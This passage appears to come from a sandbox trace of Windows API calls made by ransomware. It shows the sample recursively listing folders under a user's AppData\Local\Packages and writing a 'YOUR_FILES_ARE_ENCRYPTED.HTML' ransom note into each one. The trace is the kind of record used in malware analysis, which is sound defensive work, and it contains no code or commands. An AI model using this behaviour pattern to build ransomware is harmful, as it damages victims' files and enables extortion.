[0118.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.439] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.440] CloseHandle (hObject=0x324) returned 1 [0118.440] GetProcessHeap () returned 0x600000 [0118.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.440] GetProcessHeap () returned 0x600000 [0118.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.442] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0118.442] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.442] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData") returned 116 [0118.442] GetProcessHeap () returned 0x600000 [0118.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.444] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData" [0118.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData\\*" [0118.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.444] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.444] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.444] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.444] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0118.445] GetProcessHeap () returned 0x600000 [0118.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.446] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.455] CloseHandle (hObject=0x324) returned 1 [0118.455] GetProcessHeap () returned 0x600000 [0118.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.455] GetProcessHeap () returned 0x600000 [0118.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.457] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0118.457] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.457] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState") returned 112 [0118.457] GetProcessHeap () returned 0x600000 [0118.457] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.459] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState" [0118.459] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState\\*" [0118.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.459] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.459] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.459] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.459] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0118.459] GetProcessHeap () returned 0x600000 [0118.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.461] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.463] CloseHandle (hObject=0x324) returned 1 [0118.463] GetProcessHeap () returned 0x600000 [0118.463] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.463] GetProcessHeap () returned 0x600000 [0118.463] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.463] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0118.463] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.463] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0118.463] GetProcessHeap () returned 0x600000 [0118.463] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0118.465] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0118.467] CloseHandle (hObject=0x31c) returned 1 [0118.467] GetProcessHeap () returned 0x600000 [0118.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.467] GetProcessHeap () returned 0x600000 [0118.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0118.470] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CLO")) returned 1 [0118.470] StrStrIW (lpFirst="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.470] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy") returned 100 [0118.470] GetProcessHeap () returned 0x600000 [0118.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.472] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy" [0118.472] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\*" [0118.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0118.472] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0118.473] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0118.473] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.473] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC") returned 103 [0118.473] GetProcessHeap () returned 0x600000 [0118.473] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.473] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC" [0118.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\*" [0118.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.475] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.475] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0118.475] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.475] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned 113 [0118.475] GetProcessHeap () returned 0x600000 [0118.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.476] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache" [0118.476] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*" [0118.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.477] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.477] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x558b61ad, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558b61ad, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558b61ad, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5db8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0118.477] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.477] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0118.477] GetProcessHeap () returned 0x600000 [0118.477] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.479] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, 